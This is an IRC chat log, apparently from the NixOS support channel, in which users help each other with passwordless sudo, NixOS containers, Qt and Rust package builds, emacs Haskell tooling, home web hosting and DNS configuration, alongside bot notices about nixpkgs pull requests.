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<{^_^}> [nixpkgs] @Ericson2314 opened pull request #44068 → treewide: Get rid off `crossAttrs`, and `makeStdenvCross` → https://git.io/fNBh6
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<worldofpeace_> Anyone want to share some good examples of setting up a home network with NixOps?
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<tertle||eltret> how do you enable sudo command without using password?
<tertle||eltret> i used to remember when i used fedora
<tertle||eltret> i been outta the game for a minute
<clever> tertle||eltret: https://nixos.org/nixos/options.html#sudo.wheel
<tertle||eltret> so i put false right?
<tertle||eltret> thats how it works?
<clever> yep
<tertle||eltret> cool
<tertle||eltret> is there a reason my rebuild is taking so long ever since i added networkmanager?
<clever> cant think of any
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<tertle||eltret> i run in verbose
<tertle||eltret> hmm i think for some reason the prompt isnt showing back up after its finished
<tertle||eltret> cool thanks
<tertle||eltret> theres a funtion for everything
<{^_^}> [nixpkgs] @Ericson2314 merged pull request #44068 → treewide: Get rid off `crossAttrs`, and `makeStdenvCross` → https://git.io/fNBh6
<d1rewolf__> is it possible to run a GUI within a nix container?
<{^_^}> [nixpkgs] @Ericson2314 pushed 9 commits to master: https://git.io/fNBjB
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<tertle||eltret> so the guy who made this for his PhD
<tertle||eltret> is he still active around the OS?
<{^_^}> [nixpkgs] @peti pushed to haskell-updates « hackage-packages.nix: automatic Haskell package set update »: https://git.io/fNReW
<clever> tertle||eltret: yeah
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<iqubic> Does anyone do haskell development here?
<iqubic> Like in NixOS.
<clever> iqubic: yes
<tertle||eltret> that seems to be the draconian use case
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<tertle||eltret> im updating steam now
<tertle||eltret> yall have really polished this OS
<iqubic> I'm just wondering what ways I have to tell emacs about things I have installed with nix-shell.
<tertle||eltret> maybe u have to use emacs from the nix-shell
<iqubic> tertle||eltret: I don't really want to do that. I'd like another solution
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<tertle||eltret> no comment
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<d1rewolf__> is there a way to configure NAT for a container imperatively?
<d1rewolf__> or do I just need to use iptables?
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<tertle||eltret> where can i see the functions that are defined in configuration.nix?
<clever> tertle||eltret: can you name one as an example?
<tertle||eltret> security.sudo.wheelNeedsPassword
<clever> thats not a function
<tertle||eltret> what is it?
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<clever> and if you click the "declared in" link on the page i previously gave, you can go directly to it
<clever> its both an attribute in the set that configuration.nix returns, and a nixos option
<iqubic> Well: I found this:
<tertle||eltret> oh i see
<iqubic> It'll work for my needs.
<{^_^}> [nixpkgs] @Ericson2314 opened pull request #44069 → libgcc: Init at 7.3.0 → https://git.io/fNRv3
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<jackdk> I use nix-sandbox from that package. works well. setting .dir-locals.el can help with dante too
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<d1rewolf__> is the preferred way to install software to a container using nixos-container update and passing it --config values/
<iqubic> jackdk: Nice.
<d1rewolf__> ?
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<iqubic> jackdk: Can you share your .dir-locals.el that you'd use?
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<jackdk> iqubic: https://pastebin.com/iRScUa6T , more or less. I cribbed some stuff from https://github.com/reflex-frp/reflex-platform/pull/237
<{^_^}> reflex-frp/reflex-platform#237 (by srid, open): Spacemacs setup instructions
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<iqubic> jackdk: What does that do?
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<iqubic> jackdk: What is "project1"?
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<jackdk> directory names
<jackdk> so it's like a list of patterns to match directories and files within the directories, and then it overrides a bunch of variables in the buffer so dante _should_ call nix-shell --run to find the right cabal
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<jackdk> see also: https://www.emacswiki.org/emacs/DirectoryVariables , and your friendly neighbourhood emacs manual
<iqubic> Can I remove the "project1" thing, or not?
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<jackdk> depends on how your project repo is set up. This was from a repo that used reflex-platform and had three cabal projects
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<iqubic> Can I see the directory structure of the project this is in?
<jackdk> not really, sorry
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<iqubic> oh. I see.
<iqubic> I'm just trying to figure out exactly why there are 3 "project" sections.
<jackdk> it's still proprietary code, I'm afraid. https://github.com/ElvishJerricco/reflex-project-skeleton is similar, where backend/common/frontend are my project1/project2/project3
<jackdk> reflex-platform compiles backend and common with ghc, frontend and common with ghcjs
<d1rewolf__> i haven't said it today yet...so....
* d1rewolf__ yells "NixOS is f***** amazing. Thank you"
<d1rewolf__> seriously
<d1rewolf__> I've run linux as my primary OS since 97 and this is the first time I've been truly, really, happy
<tertle||eltret> good deal d1rewolf__
<tertle||eltret> so ur 10 years in
<jackdk> iqubic: you don't need the 3-subproject setup, you could probably set the "dante-target" var in the final `(nil . (...))` stanza
<jackdk> if you*
<d1rewolf__> tertle||eltret, more like 21 years ;)
<iqubic> And just get rid of the 3 other parts?
<d1rewolf__> tertle||eltret, but not with nixos. I started with redhat 5.2
<jackdk> aye
<iqubic> cool.
<d1rewolf__> or 5.1. can't remember
<tertle||eltret> ok cool
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<d1rewolf__> tertle||eltret, I've only been on nixos for about three days
<tertle||eltret> i used it on and off for about 6 years
<d1rewolf__> but yes, for me, it's that awesome
<d1rewolf__> I move between way too many machines
<tertle||eltret> i like nix too, although im not really a coder, so I dont fully grasp it or ever fully appreciate it but I do like it
<tertle||eltret> Ive always had a thing for funtional languages
<tertle||eltret> when i was learning to program, or at least trying to, i always like functional
<d1rewolf__> being able to keep them in sync is actually not just amazing but transcedent
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<tertle||eltret> but it seems that all the programmers that I meet do not like, or even know about funtional languages
<d1rewolf__> tertle||eltret, aye. I'm a coder by night, CIO by day. it definitely makes a huge difference to be able to decipher the language
<d1rewolf__> tertle||eltret, I think it depends on the type of programmer you meet
<d1rewolf__> there are laborers, and there are lovers
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<tertle||eltret> thats true, and i only know a few
<tertle||eltret> im a network analyst at an ISP
<tertle||eltret> aka a ticket monkey
<d1rewolf__> the lovers welcome functional and imperative. the laborers do whatever it takes to bring home a check. and then there's a spectrum in between
<d1rewolf__> tertle||eltret, as someone who has seen the other side (management in a company of around 3500 employees), relish that ticket monkey status ;-)
<d1rewolf__> aside from salary, I'd trade it in a heart beat
<d1rewolf__> and to be honest, I'd probably trade it anyway
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<d1rewolf__> some jobs just aren't worth your health
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<tertle||eltret> thats true
<tertle||eltret> long hours and always on call
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<d1rewolf__> tertle||eltret, yeah. the same goes for management, but you end up adding "politics|angry employees|etc"
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<d1rewolf__> but anyway, tertle||eltret, spend the time to learn nixos. it's definitely worth it
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<d1rewolf__> I've spent the last week or so reading everything I can about it. there's a learning curve, but it's the mountain you have to climb to see nirvana on the other side :)
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<joepie91> tertle||eltret: it might help to consider the perspective that most software developers aren't actually building novel or even necessarily good software, they're just implementing common business requirements with the right company logo in the corner
<joepie91> tertle||eltret: from that perspective it's not unexpected that many people tend to follow the well-trodden paths, even if they're not necessarily interesting or even optimal
<joepie91> and in practice, most boring business software just isn't written in functional languages
<tertle||eltret> thats true joepie91
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<tertle||eltret> i have the problem of not finding anything to code, or not being able to move from the hello world tuts to the 5000 line project
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<joepie91> (that's not to say that I consider functional languages the be-all-end-all of programming, to be clear)
<joepie91> tertle||eltret: ah, the "draw the rest of the fucking owl" problem :)
<tertle||eltret> do you like f#?
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<joepie91> can't say I've worked with it
<tertle||eltret> lol, yeah thats how it feels
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<tertle||eltret> haskell probably isnt the best language to start on
<tertle||eltret> but i did go through the 'write yourself a scheme' thing
<tertle||eltret> i still need to run through version 2 of it
<joepie91> tertle||eltret: so my advice for your problem would be... pick any project that you would *want* to work on, regardless of how big it is; and then *don't* try to design the entire thing upfront, but start with the absolute simplest possible version of it, and then gradually add on bits and pieces while learning about each of those bits individually; in the process, don't be afraid to go back and change existing code once you realize that it could have
<joepie91> been done better
<joepie91> frontloading the design of an entire project is going to be a nightmare if you don't already have experience to draw from, learning gradually works much better
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<d1rewolf__> `
<samueldr> sometimes, doing a small silly thing can be enlightening
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<joepie91> so like, if you want to build, say, a forum; start with a plain webpage... then make that webpage show the current server time... then make it accept some input, and echo back that input... then make it eg. store the input in some sort of file or database, and echo it back from there... etc.
<joepie91> set yourself smaller goals to work towards, goals that you can google
<tertle||eltret> yeah thats a good idea
<tertle||eltret> i was thinking about building a telnet client and 'server'
<tertle||eltret> cuz i think networking is interesting
<joepie91> somewhere around the step of "store it in a database and echo it back from there" you'd realize that hey databases are a pretty big concept, and you'd want to split that up into smaller pieces as well; what's the simplest form you can store some data in? then, how can you make sure that the data is correct?, then, what if you have related data? etc.
<_d0t> ohai! I need some help with building a package. When I run nix-shell with necessary args, everything works just fine. With nix-build however cmake can't find Qt5LinguistTools.
<joepie91> tertle||eltret: go for it :)
<samueldr> tertle||eltret: good start may be implementing a full `echo` client/server as per the RFC
<_d0t> Qt5LinguistTools seems to be a part of qt5.qttools
<tertle||eltret> oh ok
<joepie91> I'd simplify samueldr's suggestion, removing the "as per the RFC" and the "client" parts to start with
<joepie91> just a thing that echoes back what you send it over TCP
<tertle||eltret> echo is just a print function isnt it?
<joepie91> (then you can test it with an existing telnet client)
<tenten8401[m]> Anyone here know if there are any GPU stress tests available for NixOS? I'm wanting to test a fan curve script but I can't seem to find something that really stresses it very well
<samueldr> hi _d0t! since we get real questions, let's move off-topic to #nixos-chat tertle||eltret joepie91 d1rewolf__ :)
<joepie91> fair enough :)
<tertle||eltret> so would the echo server be over telent or what protocol?
<tertle||eltret> echo isnt a network protocol is it?
<tenten8401[m]> I would use something like Ungine Superposition but I can't run it because of a bad interpreter
<tenten8401[m]> well, it's a binary, I mean linker
<samueldr> _d0t: looking at it quickly
<_d0t> samueldr, thx
<samueldr> _d0t: figured it out
<_d0t> I run nix-shell with -p stdenv cmake gcc pkgconfig qt5.qtbase qt5.qttools qt5.qtx11extras poppler_qt5
<joepie91> tenten8401[m]: let's move to #nixos-chat with this conversation :)
<_d0t> if that helps
<joepie91> errr
<joepie91> oh
<joepie91> they disappeared
<joepie91> sorry tenten8401[m] :D
<samueldr> you see how `buildInputs = [ (with qt5; [ a bc c ]) d ]`
<samueldr> this creates a list with a list and a derivation
<samueldr> you probably want to concatenate the lists
<_d0t> so, what should that line be?
<samueldr> `buildInputs = [ poppler_qt5 ] ++ (with qt5; [qtbase qttools qtx11extras];`
<{^_^}> [nixpkgs] @eqyiel opened pull request #44071 → eot_utilities: change platforms to unix → https://git.io/fNRJ6
<samueldr> uh, I'm missing a parenthesis near the end :)
<_d0t> oh yeah
<_d0t> now it's building
<_d0t> samueldr, thanks!
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<samueldr> > [ [1 2 3] 4 ] == [ 4 ] ++ [ 1 2 3 ] # for an example, _d0t
<{^_^}> false
<_d0t> Yeah, I got this
<samueldr> :) great
<tertle||eltret> 1+2
<samueldr> hope to see a PR soom with qcomicbook :D
<_d0t> yup
<joepie91> wb tertle||eltret
<tertle||eltret> o/
<joepie91> tertle||eltret: I need to sleep, but if you hop into #nixos-chat there's probably going to be more people with advice on where to get started :)
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<tertle||eltret> cool thanks, i need to sleep to. going to do that very soon
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<{^_^}> [nixpkgs] @Chiiruno opened pull request #44072 → dolphinEmuMaster: 2018-07-02 -> 2018-07-22 → https://git.io/fNRUJ
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<d1rewolf__> guys, updating a container after editing configuration.nix says "error: opening lock file '/nix/var/nix/db/big-lock': Read-only file system". any ideas why?
<coconnor> checking the unlikely but: did the OS encounter a fault that caused a RO remount?
<d1rewolf__> coconnor, no. not at all :-/
<clever> d1rewolf__: what command did you run to cause that error?
<d1rewolf__> clever: from within the container, "nixos-rebuild switch"
<clever> d1rewolf__: the container doesnt have a writable store by default
<d1rewolf__> clever, oh, ok. assuming it's in the manual, i'll track that down. thanks for the pointer
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<d1rewolf__> clever, ok, so I don't see it in the manual. Are we talking aboout a chmod or something else?
<clever> d1rewolf__: its always mounted readonly, no option to change that
<coconnor> the expectation is for the container to be re-built for each change
<d1rewolf__> clever, oh. ok. so how should one install packages in a container? nixos-contaimer update?
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<{^_^}> [nixpkgs] @lukeadams opened pull request #44073 → pyserial: fix build on Darwin → https://git.io/fNRU7
<clever> add it to the systemPackages of the container i believe
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<d1rewolf__> clever, that's if you're declaring the container in configuration.nix, rather than using nixos-container create, correct?
<clever> i dont really use the imperative containers
<d1rewolf__> clever, for my use case, it'd be nice
<coconnor> nixos-container update will apply an updated config
<d1rewolf__> coconnor, ok. I feared as much. I guess I'll just have to maintain an external config I pass to update. thanks for the help
<coconnor> ah! it should already have created a copy of the config on the host
<coconnor> if keeping that in sync with the system at all times is required then the declarative is a better path
<clever> coconnor: you can read all of the container files in /var/lib/containers
<d1rewolf__> coconnor, not necessarily keeping in sync, but remembering what I've already installed when I run the next update command :0
<coconnor> d1rewolf__: gotcha. "what already installed" will be defined by the configuration copy in /var/lib/containers
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<d1rewolf__> coconnor, ah...so edit /var/lib/containers/<vmname>/etc/nixos/configuration.nix from the host and run nixos-container update?
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<coconnor> correct
<d1rewolf__> coconnor, awesome. that works. thanks
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<coconnor> You can also *replace* the config by passing a new config to nixos-container update. Emphasis on the replace cause I thought that did an append and nuked a config once or twice.
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<d1rewolf__> coconnor, great to know. thanks ;)
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<{^_^}> [nixpkgs] @ryantm merged pull request #44033 → pet: init at 0.3.2 → https://git.io/fN8jX
<{^_^}> [nixpkgs] @ryantm pushed commit from @kalbasit to master « pet: init at 0.3.2 »: https://git.io/fNRTg
<{^_^}> [nixpkgs] @ryantm merged pull request #44050 → amazon-ecr-credential-helper: init at 0.1.0 → https://git.io/fN4E2
<{^_^}> [nixpkgs] @ryantm pushed commit from @kalbasit to master « amazon-ecr-credential-helper: init at 0.1.0 »: https://git.io/fNRTa
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<{^_^}> [nixpkgs] @ryantm merged pull request #44048 → dbxml: init at 6.1.4 → https://git.io/fN4lt
<{^_^}> [nixpkgs] @ryantm pushed commit from @danieldk to master « dbxml: init at 6.1.4 »: https://git.io/fNRTw
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<{^_^}> [nixpkgs] @greydot opened pull request #44074 → Add qcomicbook. → https://git.io/fNRTQ
<_d0t> samueldr, here's your PR (:
<{^_^}> [nixpkgs] @jbedo opened pull request #44075 → singularity-tools: create required bind points → https://git.io/fNRT7
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<samueldr> the commit message is expected to be "packagename: init at x.y"
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<nly> hi
<samueldr> otherwise, I don't think there's anything outright wrong with what I'm seeing there
<coconnor> howdy
<_d0t> samueldr, fixed
<samueldr> great _d0t :)
<nly> a pkg needs 'defusedxml' i found it as 'python36.defusedxml' on nix pkgs. with 'defusedxml' i get an error called anonymous function without required argument
<nly> coconnor doing great wbout you? :)
<nly> it's a beautiful morning
<iqubic> Is it possible to install NixOS headless as a server?
<samueldr> uh, yes
<samueldr> almost anything you can do with a distro, you can with nixos
<coconnor> nly: excellent!
<iqubic> I was wondering if it made sense to use NixOS as a web server.
<samueldr> and when I say "almost", I mean that what you "can't" is "shouldn't" (like impurities)
<samueldr> iqubic: there are many nixos installations serving sites
<samueldr> https://nixos.wiki/ is one
<samueldr> unless they migrated to S3, https://nixos.org/ too is
<iqubic> What I want to do is host my own website on a server.
<clever> iqubic: i use nixos for my nas and router
<samueldr> it's definitely possibly
<samueldr> possible*
<samueldr> (almost sounder like a ned flanders there)
* samueldr should stop writing while he's still ahead
<coconnor> iqubic: is this server going to be a VM on a cloud host? There may already be initial images available
<iqubic> No. I'm planning to run this on a physical machine.
<clever> iqubic: just do a normal nixos-install, and then dont enable xserver
<clever> then unplug the monitor
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<iqubic> I see. I'll think about doing that.
<iqubic> Is this a reason why I'd want to use nixops?
<iqubic> What is nixops?
<clever> iqubic: nixops makes it far simpler to manage and update many headless machines at once
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<iqubic> I'm only managing one headless nixos install.
<clever> iqubic: with this file, and the ones it references, i can update my router and nas with 1 command
<coconnor> I woudln't worry about nixops yet
<clever> you can always convert the box to nixops at a later time
<clever> i did that with both my nas and router
<iqubic> What do you do with your server?
<iqubic> s/server/router/
<clever> route packets
<iqubic> I see.
<coconnor> ;)
<iqubic> I don't need that sort of thing.
<clever> the router manages sharing 1 modem ip between every machine in the house
<coconnor> me openshift, libvirt, http, jenkins, transmission, retroarch and samba
<iqubic> I just want to host my own website online. I'm not sure how hard/expensive that might be.
<clever> iqubic: install nixos on any machine you can leave on 24/7, enable services.nginx, setup a port forward in the router, done
<coconnor> yep!
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<coconnor> nginx is a nice choice too. Nixos has a nice module for it.
<iqubic> How hard is it to set up a port forward in the router? Does that cost lots of money?
<clever> you just open the router config, type in the port and ip of your server box, and hit save
<iqubic> I see.
<coconnor> however, if this is a router for a modem the IP may be provided via DHCP
<coconnor> if you'd like a fixed domain name then a dynamic DNS service is a cheap option
<iqubic> I don't know what that even means.
<iqubic> Does a dynamic DNS server cost money? Can't I run that myself.
<coconnor> Will this server connect to the internet via a cable modem or?
<clever> there are free dynamic dns services
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<iqubic> I'm really not sure what kind of a router I have. I'll have to look into that.
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<coconnor> serving from a home connection and router can be tricky. Definitely doable tho
<clever> in the case of my connection, the IP only changes if i disconnect
<clever> so as long as the router stays on, the ip doesnt change
<coconnor> I did have an example of a systemd timer that would refresh the dyndns association
<coconnor> but the connection I have is the same: usually the same IP. so disabled it.. trying to find in git history
<clever> in my case, i have nixos on the router, so i could create a dhcpcd hook that only updates the dns when the dhcp gives me an ip
<{^_^}> [nixpkgs] @hlolli opened pull request #44076 → lumo: init at 1.9.0-alpha → https://git.io/fNRI6
<coconnor> ah yea. that would be nicer than the script I had.
<coconnor> also, just noticed the router I have (asus) has automation for dyndns refresh
<clever> some routers also have dyndns support right in them
<clever> just input the server url, domain, name, password
<coconnor> clever: have you tried running dnsmasq cache on your router?
<clever> coconnor: i have a bind cache on the router
<coconnor> ooooo
<coconnor> that's the bit of fanciness I'd like
<clever> coconnor: this sets up a cache that weill respond to my lan (line 90), and will also serve some custom domains
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<clever> coconnor: and line 138 tells everything to use it
<coconnor> hmmm. I haved a dnsmasq server for kuburnetes support. Not sure how to combine the two
<coconnor> thanks! I'll check it out. done with DNS trickery for now haha
<clever> coconnor: i would just get rid of dnsmasq
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<coconnor> problem is that I don't really understand the kubernetes dns requirements. Certainly not enough to translate to bind
<clever> coconnor: run wireshark on port 53 and see what kubernetes does and the replies it gets
<coconnor> fairly sure I know that aspect. I think it's more spending the time to map the config options
<clever> coconnor: at a glance, i think that just maps agh.dev to an ip
<clever> coconnor: create a zone file for dev, like i did with localnet, and give agh.dev an A record
<coconnor> and all subdomains of .agh.dev to the same IP
<coconnor> plus reverse lookup for hte same
<clever> thats a wildcard subdomain then
<clever> *.agh.dev IN A i think
<coconnor> ah ok
<coconnor> makes sense
<clever> and i have a second file for the reverse dns
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<coconnor> ah yea. now that I'm reading this. One bit of trickery is (I think) "/.cluster.local/"
<{^_^}> [nixpkgs] @Moredread opened pull request #44077 → [WIP] slic3r-prusa3d: 1.40.1 -> 1.41.0 → https://git.io/fNRIF
<clever> that tells it to relay the requests to a given server when its from that domain
<coconnor> I think that says "for any request under .cluster.local forward to port 8053"?
<clever> for that, you want NS records
<coconnor> ah cool!
<clever> create a .local TLD, and then add some NS records to define what ip handles the cluster.local subdomain
<clever> i do see how dnsmasq makes all the fun things "simple"
<clever> but as soon as you want something more complex, i can see it getting to be a lot more complex
<clever> bind just uses zone files that almost exactly match the dns protocol and the output from `dig`
<coconnor> OTOH dnsmasq abstractions are.. well.. abstractions. The bind configuration is easier for me to understand. Less magic sauce.
<clever> yeah
<clever> coconnor: one of the more advanced dns setups ive seen (which i have theorized would work) is the dns under iohk.io, it has at least 5 or 6 subdomains, each with its own NS records, pointing to seperate entities within route53, that all behave like seperate self-contained domains
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<coconnor> hmm fancy indeed. Necessary for reliability I bet. gotta have that client side participation dns enables
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<clever> coconnor: i think its more for breaking up the permission models
<clever> and to deal with some subdomains being managed by aws and others not
<clever> its hard to encode that into the dns config
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<{^_^}> [nixpkgs] @volth opened pull request #44078 → [staging] cpan2nix updates → https://git.io/fNRLd
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<{^_^}> [nixpkgs] @kalbasit opened pull request #44079 → bazel: patch runfiles.bash to include defaultShellPath in PATH → https://git.io/fNRtk
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<|Leary> If I have local source for a derivation in a git repo and I change branches, it rebuilds even when its already built the other branch before. Is it because something git is doing in src/.git/ is changing the hash? Is there an easy way to exclude those irrelevant changes so nix only hashes and uses the actual source files?
<cocreature> or cleanSource which will by default filter common vcs directories, editor temp files and stuff like that
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<|Leary> Looks promising. Thanks cocreature.
<|Leary> Excellent; the default cleanSource seems to at least prevent rebuild on switching to and from a branch. :]
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<{^_^}> [nixpkgs] @Ericson2314 merged pull request #44069 → libgcc: Init at 7.3.0 → https://git.io/fNRv3
<{^_^}> [nixpkgs] @Ericson2314 pushed 3 commits to master: https://git.io/fNRsT
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<jD91mZM2> Is there any way to use a local path as source without copying it to the store?
<jD91mZM2> I just figured out another way to handle my own programs - I could just override the nixpkgs version's source to point to my latest source
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<jD91mZM2> But if I use ~/path/to/thing, it copies the entire directory, including the build directory
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<jD91mZM2> I feel like copying is redundant, since I have the thing on disk anyway and always want to use the absolutely latest version of the source
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<tilpner> I don't think direct access is possible with sandboxing, but you can copy just the source (without target/build)
<srhb> jD91mZM2: You can use the filtering mechanisms to get rid of anything extraneous
<srhb> What tilpner said.
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<tilpner> ignore = map toString [ ./target ];
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<jD91mZM2> tilpner: Where would I put that in src = ~/path/to/thing?
<tilpner> src = filterSource (path: type: !elem path ignore) ./.;
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<jD91mZM2> ah
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<jD91mZM2> I had to prefix things with `builtin.`, but thank you, I think it works! Now I just need to figure out how it works :D
<booglewoogle> hey, how would I add a custom desktop application in nixos? since the run/current-system/sw/share/applications/ is read-only
<jD91mZM2> It still says "warning: dumping very large path (> 256 MiB); this may run out of memory", but maybe the source just is that big?
<tilpner> jD91mZM2 - If you adjust ./. you also have to adjust ./target
<jD91mZM2> Yep just noticed
<jD91mZM2> Wait, why doesn't [ ./target ] also copy?
<jD91mZM2> brb
<tilpner> Because it doesn't end up in a string
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<tilpner> (Uhm, well)
<tilpner> "${./target}" would pull target into the store. "${toString ./target}" wouldn't
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<booglewoogle> or how would i edit an existing one, that'd also help
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<tilpner> booglewoogle - That depends greatly on what application you want to add
<tilpner> booglewoogle - The general process is: Write a Nix expression for that application, and then either install that manually, or import it from your nixos-config
<booglewoogle> hmmm
<booglewoogle> okay
<booglewoogle> oh i meant
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<booglewoogle> just the link
<booglewoogle> like
<booglewoogle> i wanna add an option to the launcer of an existing application
<tilpner> Oh
<booglewoogle> as a default launch option
<booglewoogle> but it won't let me since the directory is read-only
<srhb> booglewoogle: Either you override the derivation producing the current file
<srhb> Or just add a local version in your homedir
<srhb> Can't mix pure and impure :)
<booglewoogle> okay
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<booglewoogle> thanks!
<booglewoogle> local it is then, wanted to avoid that :p
<srhb> Overriding is fairly simple in this case.
<srhb> I recommend it
<raman> Hi folks, do you use NixOS on desktop?
<booglewoogle> okay
<srhb> raman: Yes
<etu> raman: yes:)
<tilpner> raman - As opposed to server, or laptop?
<srhb> booglewoogle: Find out which derivation produces the specific desktop file
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<booglewoogle> i haven't looked into that yet
<booglewoogle> yea got that
<srhb> booglewoogle: No time better than the present!
<booglewoogle> i'm ready!
<srhb> booglewoogle: Have you ever used overlays?
<booglewoogle> can you point me somewhere to learn about how to do that?
<booglewoogle> overlays?
<srhb> Yes, you'd want to read up on overlays in the nixpkgs manual
<raman> I am asking because I see that Xorg is not updated. The latest version is 1.20. Maybe I am looking in the wrong place?
<srhb> booglewoogle: The idea here is to take the existing derivation and modify one of its phases so that its desktop file contains whatever you want
<raman> srhb: etu what Xorg -version returns for you?
<booglewoogle> srhb: okay, starting to dig in. thanks!
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<tilpner> raman - 1.19.6
<srhb> booglewoogle: You will also need this: https://nixos.org/nixpkgs/manual/#sec-pkg-overrideAttrs
<etu> raman: 1.19.6, but things are updated quite well overall at least if you're on unstable:)
<raman> Thank you etu, so unstable has 1.20?
<cocreature> except when unstable is broken for days … :(
<raman> ;(
<etu> raman: No, not yet. It doesn't even seem to be in master yet. Checked in there. But it will for sure get there :)
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<srhb> booglewoogle: In pseudocode, something like this: (self: super: super.yourPackage.overrideAttrs (oa: { postInstall = ''echo foo > $out/share/yourpackage.desktop''; })) -- and then this would go in the nixpkgs.overlays list in configuration.nix
<raman> 1.20 is 2 months old ;(
<etu> ,which channel
<etu> err, no. I forgotten how to do that
<srhb> I think "which" is a lambdabotism
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<srhb> raman: You can write up an issue for us to upgrade it -- or even better, submit a PR :)
<tilpner> ,which-channel
<srhb> Sad smileys just make us sad :(
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<etu> raman: At the top here in the dropdowns you got quite good descriptions of how channels are updated: https://howoldis.herokuapp.com/
<etu> raman: As well as the link that tilpner got for you there, the gist :)
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<raman> Thank you etu. I do not see 1.20 on https://github.com/NixOS/nixpkgs/blob/master/pkgs/servers/x11/xorg/default.nix#L2591 or in staging branch.
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<etu> raman: As I said, it's not in master yet where I checked. And things usually don't stay very long in staging. But as others said above. Write an issue or make a PR for it. We're very happy for all the help we can get:)
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<etu> Hmm, payday today. Now I'm very tempted to book a trip to Nixcon:)
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<raman> Ack. Just it is worrisome to see that for 2 months no one file a PR already. How to check who is Xorg server maintainer? Maybe there is a good reason to not update or maybe you are all on Wayland :P
<{^_^}> [nixpkgs] @peti pushed to master « runelite: fix evaluation errors »: https://git.io/fNRZV
<{^_^}> [nixpkgs] @Ericson2314 opened pull request #44081 → cross stdenv: Forget `allowedRequisites = nulll;` on inline → https://git.io/fNRZw
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<{^_^}> [nixpkgs] @domenkozar pushed to master « haskell: remove/add some servant overrides »: https://git.io/fNRZD
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<tilpner> raman - Last bump was by vcunat, but I'm not sure that means anything in this case
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<etu> raman: Well, there's roundups for security fixes. And if Xorg would be in there it would been updated due to security related things quicker. And things overall get's updated frequently, so in this case it's probably just that nobody have seen the need for 1.20.
<jD91mZM2> tilpner: Thanks! So I guess I could shorten it to (builtins.filterSource (path: _type: path != (toString ./target)) ./.)
<jD91mZM2> Since I only have one exclude
<tilpner> jD91mZM2 - In this case, yes. But I like the flexibility of having an ignore list
<booglewoogle> @srhb I went with https://nixos.wiki/wiki/Overlays, used the example as a template (which incidentally precisely adds a launch option to an application) and tried to have it apply the overlay on the system level
<{^_^}> [nixpkgs] @bkchr opened pull request #44082 → gnome2.gconf: Adds python that is required by scripts in GConf → https://git.io/fNRZx
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<booglewoogle> that includes a change of the NIX_PATH though, which from my experience isn't persistent? am I missing something?
<jD91mZM2> Ummmm suddenly I'm getting "no matching version `= 2.32.0` found for package `clap`"
<jD91mZM2> This version does exist
<tilpner> booglewoogle - You can absolutely make persistent changes to NIX_PATH, e.g. with nix.nixPath
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<srhb> But it may be a bit confusing since it takes effect AFTER first activation
<booglewoogle> ah
<srhb> booglewoogle: I recommend using nixpkgs.overlays to get used to it initially. Then you can start exploring the differences.
<srhb> Tastes may differ :-)
<booglewoogle> okay
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<srhb> (fwiw I use an altered nix.nixPath because I want my user and system to have the same overlays)
<booglewoogle> alright, thanks tilpner and srhb
<jD91mZM2> It also seems to say "unpacking source archive /nix/store/q6nsrjhrc3nxlljzzsnyx1pay4i0fdrb-termplay-2.0.4-vendor". But I renamed my package to termplay-local...
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<jD91mZM2> I assume overrideAttrs doesn't update the rust vendor thing
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<tilpner> jD91mZM2 - Renaming the derivation might be different from renaming the package
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<jD91mZM2> tilpner: How so?
<tilpner> jD91mZM2 - .overrideAttrs doesn't change Cargo.toml
<tilpner> I don't actually know where it takes the name from
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<jD91mZM2> Oh yeah no that's not what I mean
<jD91mZM2> I thought the vendor dir would take the name from the nix derivation
<jD91mZM2> maybe it doesn't
<jD91mZM2> My theory is that since I created the derivation with buildRustPackage, overriding the fields won't do too much because I'm just overriding the generated mkDerivation fields
<jD91mZM2> So for example vendor stuff will already be set up
<jD91mZM2> Would sort of explain the "no matching version" error
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<tilpner> Oh, also update the cargoSha256 if you have original termplay in your store
<tilpner> Doesn't matter to what, just update it
<jD91mZM2> Good point, will try
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<jD91mZM2> tilpner: That kinda confirms my theory - I get the same error about clap version missing. No error about the sha being incorrect, which it clearly is
<jD91mZM2> cargoSha256 = "a"
<tilpner> Yeah, overrideAttrs won't help here
<tilpner> You may have to copy the thing
<jD91mZM2> Yep, trying currently to do something like `buildInputs = old.buildInputs`
<jD91mZM2> Can I use inherit for this?
<tilpner> You could
<tilpner> But I don't see why it would help
<tilpner> The syntax would be inherit (old) buildInputs;
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<jD91mZM2> ​​/shrug Just thinking it could be cleaner
<tilpner> No, that's not what I mean. inherit is better than buildInputs = old.buildInputs, but it won't help fix your clap problem
<jD91mZM2> I mean making a new derivation with mostly the same values as the old one should hopefully create a new updated vendor too
<tilpner> Making a new derivation with what? mkDerivation or buildRustPackage?
<{^_^}> [nixpkgs] @dezgeg pushed to master « gnome2.GConf: Add python2 dependency for gsettings-schema-convert »: https://git.io/fNRCs
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<jD91mZM2> buildRustPackage
<jD91mZM2> Like, instead of pkg.overrideAttrs, I do rustPlatform.buildRustPackage { inherit (pkg) buildInputs }
<jD91mZM2> (incomplete)
<tilpner> Oh, hmm
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<tilpner> That seems like it would work
<tilpner> Could just do buildRustPackage (pkg // { src = ...; cargoSha = ...; })
<jD91mZM2> oooo good idea
<tilpner> Not sure if that'll work with callPackage-added elements though
<jD91mZM2> Let's find out
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<tilpner> If it doesn't, try pkg.drvAttrs // ...
<{^_^}> [nixpkgs] @bkchr closed pull request #44082 → gnome2.gconf: Adds python that is required by scripts in GConf → https://git.io/fNRZx
<jD91mZM2> Well, it just complained about the sha hash being wrong :D
<tilpner> yay?
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<jD91mZM2> YAY!
<jD91mZM2> Means it's actually trying to build the correct thing
<jD91mZM2> Oh wait, this was the inherit version
<jD91mZM2> "cannot coerce a set to a string"
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<tilpner> > rustPlatform.buildRustPackage termplay.drvAttrs
<{^_^}> "<derivation /nix/store/i65k4iyxyixkp99mfwazxbvqa93dqn35-termplay-2.0.4>"
<jD91mZM2> Now it builds again :D
<jD91mZM2> Thanks a lot :D
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<jD91mZM2> I'm writing this directly in home-manager. I wish I could see the build output :P
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<tilpner> Overlay templay-local and use that from HM. Then you can interact with -local from outside too
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<jD91mZM2> I don't want to use it outside of HM though
<tilpner> "I wish I could see the build output"
<tilpner> Yes you do
<jD91mZM2> I wish, but I'm too lazy to do anything about it :P
<tilpner> See, that's okay, but it's a different reason than "I don't want to"
<jD91mZM2> I mean, I don't want to be able to see it in nix-env -q, that'd just be confusing
<jD91mZM2> "since when did nix get this what is thi- oh right"
<{^_^}> [nixos-weekly] @domenkozar pushed to master « Draft 2018/04 »: https://git.io/fNRWf
<tilpner> I didn't mention nix-env. It should be avoided :/
